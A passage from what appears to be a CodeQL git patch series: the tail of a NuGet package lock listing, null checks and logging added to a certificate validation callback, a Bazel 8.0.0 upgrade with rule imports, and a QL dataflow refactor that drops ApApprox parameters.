"netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.Bcl.AsyncInterfaces", "id": "Microsoft.Bcl.AsyncInterfaces", "version": "9.0.0", "sha512": "sha512-bYp2ksSR5uB6xqOa4NyD2gBOeFrc2n8FAWoh781MNMDcPjk1ysD7DNpv7r7sQOXfdFJT6F/syX7fN4lmUsn+RQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Threading.Tasks.Extensions"], "net462": ["System.Threading.Tasks.Extensions"], "net47": ["System.Threading.Tasks.Extensions"], "net471": ["System.Threading.Tasks.Extensions"], "net472": ["System.Threading.Tasks.Extensions"], "net48": ["System.Threading.Tasks.Extensions"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["System.Threading.Tasks.Extensions"], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Threading.Tasks.Extensions"], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.Build", "id": "Microsoft.Build", "version": "17.12.6", "sha512": "sha512-YEiL5xKowbwnr52YroALNHg8YurjLyFTlhv3USrswhubuxN2ldY1TmQpBKQ4K28UgWJV9BxTVXY9/CecMNDeOA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Memory", "System.Reflection.MetadataLoadContext", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net48": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Memory", "System.Reflection.MetadataLoadContext", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Configuration.ConfigurationManager", "System.Reflection.MetadataLoadContext", "System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.Build.Framework", "id": "Microsoft.Build.Framework", "version": "17.12.6", "sha512": "sha512-UjfxnrQN9BPVtO0Kvv2FB5dpN2CX5snc7coq5vVQdbCV6kdSpI/r+GZTLvU/5BTT8y8bvIUqoocxRR674N6bWg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net7.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net8.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, From 547af6c3c957d053c2b6f8cdc6d2ff8f8b2f249f Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 9 Dec 2024 10:11:49 +0100 Subject: [PATCH 0966/1267] C#: Introduce null checks in the NugetPackageRestorer. --- .../NugetPackageRestorer.cs | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs index d0c0af6b768..9a366d86f62 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs @@ -604,6 +604,10 @@ namespace Semmle.Extraction.CSharp.DependencyFetching { httpClientHandler.ServerCertificateCustomValidationCallback = (message, cert, chain, _) => { + if (chain is null || cert is null) + { + return false; + } chain.ChainPolicy.TrustMode = X509ChainTrustMode.CustomRootTrust; chain.ChainPolicy.CustomTrustStore.Add(this.dependabotProxy.Certificate); return chain.Build(cert); From 86c6df5cbd389db790db9a49bbe747f8bbbcdbc8 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Tue, 10 Dec 2024 10:35:48 +0100 Subject: [PATCH 0967/1267] C#: Log warning when chain or certificate is not provided in the validation. --- .../NugetPackageRestorer.cs | 1 + 1 file changed, 1 insertion(+) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs index 9a366d86f62..17547a0ec87 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs @@ -606,6 +606,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching { if (chain is null || cert is null) { + logger.LogWarning("Certificate validation trivially failed due to missing chain or certificate."); return false; } chain.ChainPolicy.TrustMode = X509ChainTrustMode.CustomRootTrust; From 53ca5083a912e20358f5e1f1c995d347c8526c65 Mon Sep 17 00:00:00 2001 From: Cornelius Riemenschneider Date: Tue, 10 Dec 2024 11:47:45 +0100 Subject: [PATCH 0968/1267] Upgrade bazel to 8.0.0. Previously, we were using 8.0.0rc1. In particular, this upgrade means we need to explicitly import more rules, as they've been moved out of the core bazel repo. --- .bazelrc | 8 ++++++++ .bazelversion | 2 +- MODULE.bazel | 9 +++++---- csharp/scripts/BUILD.bazel | 2 ++ go/BUILD.bazel | 1 + java/kotlin-extractor/BUILD.bazel | 1 + misc/bazel/BUILD.bazel | 2 ++ misc/codegen/BUILD.bazel | 2 ++ misc/codegen/generators/BUILD.bazel | 2 ++ misc/codegen/lib/BUILD.bazel | 1 + misc/codegen/loaders/BUILD.bazel | 1 + misc/codegen/test/BUILD.bazel | 1 + misc/ripunzip/BUILD.bazel | 2 ++ python/extractor/BUILD.bazel | 1 + rust/codegen/BUILD.bazel | 1 + swift/extractor/BUILD.bazel | 1 + swift/logging/tests/assertion-diagnostics/BUILD.bazel | 1 + swift/ql/integration-tests/BUILD.bazel | 2 ++ swift/swift-autobuilder/tests/BUILD.bazel | 2 ++ swift/third_party/resource-dir/BUILD.bazel | 2 ++ swift/tools/BUILD.bazel | 1 + swift/tools/test/qltest/BUILD.bazel | 2 ++ 22 files changed, 42 insertions(+), 5 deletions(-) diff --git a/.bazelrc b/.bazelrc index 60455dd72c6..40beef6eecc 100644 --- a/.bazelrc +++ b/.bazelrc @@ -24,4 +24,12 @@ common --registry=https://bcr.bazel.build common --@rules_dotnet//dotnet/settings:strict_deps=false +# Reduce this eventually to empty, once we've fixed all our usages of java, and https://github.com/bazel-contrib/rules_go/issues/4193 is fixed +common --incompatible_autoload_externally="+@rules_java,+@rules_shell" + +build --java_language_version=17 +build --tool_java_language_version=17 +build --tool_java_runtime_version=remotejdk_17 +build --java_runtime_version=remotejdk_17 + try-import %workspace%/local.bazelrc diff --git a/.bazelversion b/.bazelversion index 5ce91d4d61c..ae9a76b9249 100644 --- a/.bazelversion +++ b/.bazelversion @@ -1 +1 @@ -8.0.0rc1 +8.0.0 diff --git a/MODULE.bazel b/MODULE.bazel index 08a4aaa78af..d2ae279af60 100644 --- a/MODULE.bazel +++ b/MODULE.bazel @@ -15,16 +15,17 @@ local_path_override( # see https://registry.bazel.build/ for a list of available packages bazel_dep(name = "platforms", version = "0.0.10") -bazel_dep(name = "rules_go", version = "0.50.0") +bazel_dep(name = "rules_go", version = "0.50.1") bazel_dep(name = "rules_pkg", version = "1.0.1") bazel_dep(name = "rules_nodejs", version = "6.2.0-codeql.1") -bazel_dep(name = "rules_python", version = "0.36.0") +bazel_dep(name = "rules_python", version = "0.40.0") +bazel_dep(name = "rules_shell", version = "0.3.0") bazel_dep(name = "bazel_skylib", version = "1.7.1") -bazel_dep(name = "abseil-cpp", version = "20240116.0", repo_name = "absl") +bazel_dep(name = "abseil-cpp", version = "20240116.1", repo_name = "absl") bazel_dep(name = "nlohmann_json", version = "3.11.3", repo_name = "json") bazel_dep(name = "fmt", version = "10.0.0") bazel_dep(name = "rules_kotlin", version = "2.0.0-codeql.1") -bazel_dep(name = "gazelle", version = "0.38.0") +bazel_dep(name = "gazelle", version = "0.40.0") bazel_dep(name = "rules_dotnet", version = "0.17.4") bazel_dep(name = "googletest", version = "1.14.0.bcr.1") bazel_dep(name = "rules_rust", version = "0.52.2") diff --git a/csharp/scripts/BUILD.bazel b/csharp/scripts/BUILD.bazel index c4b44ac28ac..8f4f239104e 100644 --- a/csharp/scripts/BUILD.bazel +++ b/csharp/scripts/BUILD.bazel @@ -1,3 +1,5 @@ +load("@rules_python//python:defs.bzl", "py_binary") + py_binary( name = "gen-git-assembly-info", srcs = ["gen-git-assembly-info.py"], diff --git a/go/BUILD.bazel b/go/BUILD.bazel index 931f061da9e..d73e7ba1a6f 100644 --- a/go/BUILD.bazel +++ b/go/BUILD.bazel @@ -1,5 +1,6 @@ load("@gazelle//:def.bzl", "gazelle") load("@rules_pkg//pkg:mappings.bzl", "pkg_files") +load("@rules_python//python:defs.bzl", "py_binary") load("//misc/bazel:pkg.bzl", "codeql_pack", "codeql_pkg_files") gazelle( diff --git a/java/kotlin-extractor/BUILD.bazel b/java/kotlin-extractor/BUILD.bazel index f95661f8128..575b9788e8c 100644 --- a/java/kotlin-extractor/BUILD.bazel +++ b/java/kotlin-extractor/BUILD.bazel @@ -40,6 +40,7 @@ load( ) load("@rules_kotlin//kotlin:core.bzl", "kt_javac_options", "kt_kotlinc_options") load("@rules_kotlin//kotlin:jvm.bzl", "kt_jvm_library") +load("@rules_python//python:defs.bzl", "py_binary") package(default_visibility = ["//java/kotlin-extractor:__subpackages__"]) diff --git a/misc/bazel/BUILD.bazel b/misc/bazel/BUILD.bazel index c3670b75c94..e00a6f7a64c 100644 --- a/misc/bazel/BUILD.bazel +++ b/misc/bazel/BUILD.bazel @@ -1,3 +1,5 @@ +load("@rules_shell//shell:sh_library.bzl", "sh_library") + sh_library( name = "sh_runfiles", srcs = ["runfiles.sh"], diff --git a/misc/codegen/BUILD.bazel b/misc/codegen/BUILD.bazel index 52a5c001134..c7b88de96b7 100644 --- a/misc/codegen/BUILD.bazel +++ b/misc/codegen/BUILD.bazel @@ -1,3 +1,5 @@ +load("@rules_python//python:defs.bzl", "py_binary") + py_binary( name = "codegen", srcs = ["codegen.py"], diff --git a/misc/codegen/generators/BUILD.bazel b/misc/codegen/generators/BUILD.bazel index f731c42ce23..df89a2ac507 100644 --- a/misc/codegen/generators/BUILD.bazel +++ b/misc/codegen/generators/BUILD.bazel @@ -1,3 +1,5 @@ +load("@rules_python//python:defs.bzl", "py_library") + py_library( name = "generators", srcs = glob(["*.py"]), diff --git a/misc/codegen/lib/BUILD.bazel b/misc/codegen/lib/BUILD.bazel index 482d1ac178f..a68840beca3 100644 --- a/misc/codegen/lib/BUILD.bazel +++ b/misc/codegen/lib/BUILD.bazel @@ -1,4 +1,5 @@ load("@codegen_deps//:requirements.bzl", "requirement") +load("@rules_python//python:defs.bzl", "py_library") py_library( name = "lib", diff --git a/misc/codegen/loaders/BUILD.bazel b/misc/codegen/loaders/BUILD.bazel index be07c6d884b..7e7a5ec8acc 100644 --- a/misc/codegen/loaders/BUILD.bazel +++ b/misc/codegen/loaders/BUILD.bazel @@ -1,4 +1,5 @@ load("@codegen_deps//:requirements.bzl", "requirement") +load("@rules_python//python:defs.bzl", "py_library") py_library( name = "loaders", diff --git a/misc/codegen/test/BUILD.bazel b/misc/codegen/test/BUILD.bazel index dde67283335..d8c06175785 100644 --- a/misc/codegen/test/BUILD.bazel +++ b/misc/codegen/test/BUILD.bazel @@ -1,4 +1,5 @@ load("@codegen_deps//:requirements.bzl", "requirement") +load("@rules_python//python:defs.bzl", "py_library", "py_test") py_library( name = "utils", diff --git a/misc/ripunzip/BUILD.bazel b/misc/ripunzip/BUILD.bazel index ea21e6b1c94..6575b692772 100644 --- a/misc/ripunzip/BUILD.bazel +++ b/misc/ripunzip/BUILD.bazel @@ -1,3 +1,5 @@ +load("@rules_shell//shell:sh_binary.bzl", "sh_binary") + alias( name = "ripunzip", actual = select({"@platforms//os:" + os: "@ripunzip-" + os for os in ("linux", "windows", "macos")}), diff --git a/python/extractor/BUILD.bazel b/python/extractor/BUILD.bazel index eabaee519ea..77025503fe6 100644 --- a/python/extractor/BUILD.bazel +++ b/python/extractor/BUILD.bazel @@ -1,3 +1,4 @@ +load("@rules_python//python:defs.bzl", "py_binary") load("//misc/bazel:pkg.bzl", "codeql_pkg_files", "strip_prefix") py_binary( diff --git a/rust/codegen/BUILD.bazel b/rust/codegen/BUILD.bazel index fbac3d04619..37118ca8777 100644 --- a/rust/codegen/BUILD.bazel +++ b/rust/codegen/BUILD.bazel @@ -1,4 +1,5 @@ load("@bazel_skylib//rules:native_binary.bzl", "native_binary") +load("@rules_shell//shell:sh_binary.bzl", "sh_binary") _args = [ "//rust/ast-generator", diff --git a/swift/extractor/BUILD.bazel b/swift/extractor/BUILD.bazel index 8290aec4121..342125c9d4f 100644 --- a/swift/extractor/BUILD.bazel +++ b/swift/extractor/BUILD.bazel @@ -1,3 +1,4 @@ +load("@rules_shell//shell:sh_binary.bzl", "sh_binary") load("//misc/bazel:pkg.bzl", "codeql_pkg_runfiles") load("//swift:rules.bzl", "swift_cc_binary") diff --git a/swift/logging/tests/assertion-diagnostics/BUILD.bazel b/swift/logging/tests/assertion-diagnostics/BUILD.bazel index 86fbbbee7c7..c01a91fafd4 100644 --- a/swift/logging/tests/assertion-diagnostics/BUILD.bazel +++ b/swift/logging/tests/assertion-diagnostics/BUILD.bazel @@ -1,3 +1,4 @@ +load("@rules_python//python:defs.bzl", "py_test") load("//swift:rules.bzl", "swift_cc_binary") swift_cc_binary( diff --git a/swift/ql/integration-tests/BUILD.bazel b/swift/ql/integration-tests/BUILD.bazel index 3c376593c4a..352170c4cef 100644 --- a/swift/ql/integration-tests/BUILD.bazel +++ b/swift/ql/integration-tests/BUILD.bazel @@ -1,3 +1,5 @@ +load("@rules_python//python:defs.bzl", "py_library") + py_library( name = "utils", srcs = [ diff --git a/swift/swift-autobuilder/tests/BUILD.bazel b/swift/swift-autobuilder/tests/BUILD.bazel index f9a2b8eb178..507899cf445 100644 --- a/swift/swift-autobuilder/tests/BUILD.bazel +++ b/swift/swift-autobuilder/tests/BUILD.bazel @@ -1,3 +1,5 @@ +load("@rules_python//python:defs.bzl", "py_test") + [ py_test( name = test_dir + "-test", diff --git a/swift/third_party/resource-dir/BUILD.bazel b/swift/third_party/resource-dir/BUILD.bazel index 9cea2efd029..b48be643b69 100644 --- a/swift/third_party/resource-dir/BUILD.bazel +++ b/swift/third_party/resource-dir/BUILD.bazel @@ -1,3 +1,5 @@ +load("@rules_shell//shell:sh_binary.bzl", "sh_binary") + alias( name = "resource-dir", actual = select({"@platforms//os:" + os: "@swift-resource-dir-" + os for os in ("linux", "macos")}), diff --git a/swift/tools/BUILD.bazel b/swift/tools/BUILD.bazel index 777b9649068..0c59e2571e5 100644 --- a/swift/tools/BUILD.bazel +++ b/swift/tools/BUILD.bazel @@ -1,3 +1,4 @@ +load("@rules_shell//shell:sh_binary.bzl", "sh_binary") load("//misc/bazel:pkg.bzl", "codeql_pkg_files") sh_binary( diff --git a/swift/tools/test/qltest/BUILD.bazel b/swift/tools/test/qltest/BUILD.bazel index f16563eb21d..c8a9b80364d 100644 --- a/swift/tools/test/qltest/BUILD.bazel +++ b/swift/tools/test/qltest/BUILD.bazel @@ -1,3 +1,5 @@ +load("@rules_python//python:defs.bzl", "py_library", "py_test") + py_library( name = "utils", srcs = ["utils.py"], From c8046fa8e0fcb2caff7422bc5e0d2a82ec0d01c0 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 11:25:27 +0100 Subject: [PATCH 0969/1267] Dataflow: Drop some ApApprox columns and joins. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 113 ++++++++---------- 1 file changed, 48 insertions(+), 65 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 313934378c6..635e8e24aee 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -942,11 +942,9 @@ module MakeImpl Lang> { } pragma[nomagic] - predicate returnMayFlowThrough(RetNodeEx ret, Ap argAp, Ap ap, ReturnKindExt kind) { + predicate returnMayFlowThrough(RetNodeEx ret, ReturnKindExt kind) { throughFlowNodeCand(ret) and - kind = ret.getKind() and - exists(argAp) and - exists(ap) + kind = ret.getKind() } pragma[nomagic] @@ -969,11 +967,10 @@ module MakeImpl Lang> { predicate callEdgeReturn( DataFlowCall call, DataFlowCallable c, RetNodeEx ret, ReturnKindExt kind, NodeEx out, - boolean allowsFieldFlow, Ap ap + boolean allowsFieldFlow ) { flowOutOfCallNodeCand1(call, ret, kind, out, allowsFieldFlow) and - c = ret.getEnclosingCallable() and - exists(ap) + c = ret.getEnclosingCallable() } predicate relevantCallEdgeIn(DataFlowCall call, DataFlowCallable c) { @@ -981,7 +978,7 @@ module MakeImpl Lang> { } predicate relevantCallEdgeOut(DataFlowCall call, DataFlowCallable c) { - callEdgeReturn(call, c, _, _, _, _, _) + callEdgeReturn(call, c, _, _, _, _) } additional predicate stats( @@ -1004,7 +1001,7 @@ module MakeImpl Lang> { calledges = count(DataFlowCall call, DataFlowCallable c | callEdgeArgParam(call, c, _, _, _, _) or - callEdgeReturn(call, c, _, _, _, _, _) + callEdgeReturn(call, c, _, _, _, _) ) } /* End: Stage 1 logic. */ @@ -1287,7 +1284,7 @@ module MakeImpl Lang> { predicate parameterMayFlowThrough(ParamNodeEx p, Ap ap); - predicate returnMayFlowThrough(RetNodeEx ret, Ap argAp, Ap ap, ReturnKindExt kind); + predicate returnMayFlowThrough(RetNodeEx ret, ReturnKindExt kind); predicate storeStepCand( NodeEx node1, Ap ap1, Content c, NodeEx node2, DataFlowType contentType, @@ -1303,7 +1300,7 @@ module MakeImpl Lang> { predicate callEdgeReturn( DataFlowCall call, DataFlowCallable c, RetNodeEx ret, ReturnKindExt kind, NodeEx out, - boolean allowsFieldFlow, Ap ap + boolean allowsFieldFlow ); predicate relevantCallEdgeIn(DataFlowCall call, DataFlowCallable c); @@ -1437,13 +1434,12 @@ module MakeImpl Lang> { pragma[nomagic] private predicate flowThroughOutOfCall( - DataFlowCall call, CcCall ccc, RetNodeEx ret, NodeEx out, boolean allowsFieldFlow, - ApApprox argApa, ApApprox apa + DataFlowCall call, CcCall ccc, RetNodeEx ret, NodeEx out, boolean allowsFieldFlow ) { exists(ReturnKindExt kind | - PrevStage::callEdgeReturn(call, _, ret, kind, out, allowsFieldFlow, apa) and + PrevStage::callEdgeReturn(call, _, ret, kind, out, allowsFieldFlow) and PrevStage::callMayFlowThroughRev(call) and - PrevStage::returnMayFlowThrough(ret, argApa, apa, kind) and + PrevStage::returnMayFlowThrough(ret, kind) and matchesCall(ccc, call) ) } @@ -1560,12 +1556,9 @@ module MakeImpl Lang> { fwdFlowOut(_, _, node, state, cc, summaryCtx, t, ap, apa, stored) or // flow through a callable - exists( - DataFlowCall call, CcCall ccc, RetNodeEx ret, boolean allowsFieldFlow, - ApApprox innerArgApa - | - fwdFlowThrough(call, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, innerArgApa) and - flowThroughOutOfCall(call, ccc, ret, node, allowsFieldFlow, innerArgApa, apa) and + exists(DataFlowCall call, CcCall ccc, RetNodeEx ret, boolean allowsFieldFlow | + fwdFlowThrough(call, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, _) and + flowThroughOutOfCall(call, ccc, ret, node, allowsFieldFlow) and not inBarrier(node, state) and if allowsFieldFlow = false then ap instanceof ApNil else any() ) @@ -1925,7 +1918,7 @@ module MakeImpl Lang> { DataFlowCallable c, CcNoCall ctx ) { result = viableImplCallContextReducedReverse(c, ctx) and - PrevStage::callEdgeReturn(result, c, _, _, _, _, _) + PrevStage::callEdgeReturn(result, c, _, _, _, _) } bindingset[c, ctx] @@ -1939,21 +1932,20 @@ module MakeImpl Lang> { bindingset[call] pragma[inline_late] private predicate flowOutOfCallApaInlineLate( - DataFlowCall call, DataFlowCallable c, RetNodeEx ret, NodeEx out, boolean allowsFieldFlow, - ApApprox apa + DataFlowCall call, DataFlowCallable c, RetNodeEx ret, NodeEx out, boolean allowsFieldFlow ) { - PrevStage::callEdgeReturn(call, c, ret, _, out, allowsFieldFlow, apa) + PrevStage::callEdgeReturn(call, c, ret, _, out, allowsFieldFlow) } - bindingset[c, ret, apa, innercc] + bindingset[c, ret, innercc] pragma[inline_late] pragma[noopt] private predicate flowOutOfCallApaNotCallContextReduced( DataFlowCall call, DataFlowCallable c, RetNodeEx ret, NodeEx out, boolean allowsFieldFlow, - ApApprox apa, CcNoCall innercc + CcNoCall innercc ) { viableImplNotCallContextReducedReverse(innercc) and - PrevStage::callEdgeReturn(call, c, ret, _, out, allowsFieldFlow, apa) + PrevStage::callEdgeReturn(call, c, ret, _, out, allowsFieldFlow) } pragma[nomagic] @@ -1975,10 +1967,9 @@ module MakeImpl Lang> { inner = ret.getEnclosingCallable() and ( call = viableImplCallContextReducedReverseInlineLate(inner, innercc) and - flowOutOfCallApaInlineLate(call, inner, ret, out, allowsFieldFlow, apa) + flowOutOfCallApaInlineLate(call, inner, ret, out, allowsFieldFlow) or - flowOutOfCallApaNotCallContextReduced(call, inner, ret, out, allowsFieldFlow, apa, - innercc) + flowOutOfCallApaNotCallContextReduced(call, inner, ret, out, allowsFieldFlow, innercc) ) } @@ -2050,10 +2041,8 @@ module MakeImpl Lang> { private predicate fwdFlow1Out( NodeEx node, FlowState state, Cc cc, Typ t0, Ap ap, TypOption stored ) { - exists(ApApprox apa | - fwdFlow1(node, state, cc, _, t0, _, ap, apa, stored) and - PrevStage::callEdgeReturn(_, _, _, _, node, _, apa) - ) + fwdFlow1(node, state, cc, _, t0, _, ap, _, stored) and + PrevStage::callEdgeReturn(_, _, _, _, node, _) } pragma[nomagic] @@ -2097,15 +2086,14 @@ module MakeImpl Lang> { ) { exists(ReturnKindExt kind, ParamNodeEx p, Ap argAp | instanceofCcCall(ccc) and - fwdFlow(pragma[only_bind_into](ret), state, ccc, summaryCtx, t, ap, - pragma[only_bind_into](apa), stored) and + fwdFlow(pragma[only_bind_into](ret), state, ccc, summaryCtx, t, ap, apa, stored) and summaryCtx = TSummaryCtxSome(pragma[only_bind_into](p), _, _, pragma[only_bind_into](argAp), _) and not outBarrier(ret, state) and kind = ret.getKind() and parameterFlowThroughAllowed(p, kind) and argApa = getApprox(argAp) and - PrevStage::returnMayFlowThrough(ret, pragma[only_bind_into](argApa), apa, kind) + PrevStage::returnMayFlowThrough(ret, kind) ) } @@ -2178,10 +2166,10 @@ module MakeImpl Lang> { RetNodeEx ret, ReturnPosition pos, FlowState state, CcCall ccc, ParamNodeEx p, Typ argT, Ap argAp, ApApprox argApa, TypOption argStored, Ap ap ) { - exists(DataFlowCall call, ApApprox apa, boolean allowsFieldFlow | - returnFlowsThrough0(call, state, ccc, ap, apa, ret, + exists(DataFlowCall call, boolean allowsFieldFlow | + returnFlowsThrough0(call, state, ccc, ap, _, ret, TSummaryCtxSome(p, _, argT, argAp, argStored), argApa) and - flowThroughOutOfCall(call, ccc, ret, _, allowsFieldFlow, argApa, apa) and + flowThroughOutOfCall(call, ccc, ret, _, allowsFieldFlow) and pos = ret.getReturnPosition() and if allowsFieldFlow = false then ap instanceof ApNil else any() ) @@ -2216,14 +2204,13 @@ module MakeImpl Lang> { pragma[nomagic] private predicate flowOutOfCallAp( DataFlowCall call, DataFlowCallable c, RetNodeEx ret, ReturnPosition pos, NodeEx out, - Ap ap + Ap ap, boolean allowsFieldFlow ) { - exists(ApApprox apa, boolean allowsFieldFlow | - PrevStage::callEdgeReturn(call, c, ret, _, out, allowsFieldFlow, apa) and - fwdFlow(ret, _, _, _, _, ap, apa, _) and - pos = ret.getReturnPosition() and - if allowsFieldFlow = false then ap instanceof ApNil else any() - | + PrevStage::callEdgeReturn(call, c, ret, _, out, allowsFieldFlow) and + fwdFlow(ret, _, _, _, _, ap, _, _) and + pos = ret.getReturnPosition() and + (if allowsFieldFlow = false then ap instanceof ApNil else any()) and + ( // both directions are needed for flow-through FwdTypeFlowInput::dataFlowTakenCallEdgeIn(call, c, _) or FwdTypeFlowInput::dataFlowTakenCallEdgeOut(call, c) @@ -2356,7 +2343,7 @@ module MakeImpl Lang> { predicate enableTypeFlow = Param::enableTypeFlow/0; predicate relevantCallEdgeIn(DataFlowCall call, DataFlowCallable c) { - flowOutOfCallAp(call, c, _, _, _, _) + flowOutOfCallAp(call, c, _, _, _, _, _) } predicate relevantCallEdgeOut(DataFlowCall call, DataFlowCallable c) { @@ -2407,7 +2394,7 @@ module MakeImpl Lang> { DataFlowCall call, RetNodeEx ret, ReturnPosition pos, NodeEx out, Ap ap, boolean cc ) { exists(DataFlowCallable c | - flowOutOfCallAp(call, c, ret, pos, out, ap) and + flowOutOfCallAp(call, c, ret, pos, out, ap, _) and RevTypeFlow::typeFlowValidEdgeIn(call, c, cc) ) } @@ -2559,8 +2546,8 @@ module MakeImpl Lang> { } pragma[nomagic] - predicate returnMayFlowThrough(RetNodeEx ret, Ap argAp, Ap ap, ReturnKindExt kind) { - exists(ParamNodeEx p, ReturnPosition pos | + predicate returnMayFlowThrough(RetNodeEx ret, ReturnKindExt kind) { + exists(ParamNodeEx p, ReturnPosition pos, Ap argAp, Ap ap | returnFlowsThrough(ret, pos, _, _, p, _, argAp, _, _, ap) and parameterFlowsThroughRev(p, argAp, pos, ap) and kind = pos.getKind() @@ -2607,14 +2594,13 @@ module MakeImpl Lang> { predicate callEdgeReturn( DataFlowCall call, DataFlowCallable c, RetNodeEx ret, ReturnKindExt kind, NodeEx out, - boolean allowsFieldFlow, Ap ap + boolean allowsFieldFlow ) { - exists(FlowState state, ReturnPosition pos | - flowOutOfCallAp(call, c, ret, pos, out, ap) and + exists(FlowState state, ReturnPosition pos, Ap ap | + flowOutOfCallAp(call, c, ret, pos, out, ap, allowsFieldFlow) and revFlow(ret, pragma[only_bind_into](state), pragma[only_bind_into](ap)) and revFlow(out, pragma[only_bind_into](state), pragma[only_bind_into](ap)) and kind = pos.getKind() and - allowsFieldFlow = true and RevTypeFlowInput::dataFlowTakenCallEdgeIn(call, c, _) ) } @@ -2624,7 +2610,7 @@ module MakeImpl Lang> { } predicate relevantCallEdgeOut(DataFlowCall call, DataFlowCallable c) { - callEdgeReturn(call, c, _, _, _, _, _) + callEdgeReturn(call, c, _, _, _, _) } /** Holds if `node1` can step to `node2` in one or more local steps. */ @@ -2719,7 +2705,7 @@ module MakeImpl Lang> { callEdgeArgParam(_, _, node, next, _, ap) and apNext = ap or - callEdgeReturn(_, _, node, _, next, _, ap) and + callEdgeReturn(_, _, node, _, next, _) and apNext = ap or storeStepCand(node, _, _, next, _, _) @@ -3206,13 +3192,10 @@ module MakeImpl Lang> { PathNodeImpl pn1, PathNodeImpl pn2, PathNodeImpl pn3, NodeEx node, Cc cc, FlowState state, SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored ) { - exists( - DataFlowCall call, CcCall ccc, RetNodeEx ret, boolean allowsFieldFlow, - ApApprox innerArgApa, ApApprox apa - | - fwdFlowThroughStep1(pn1, 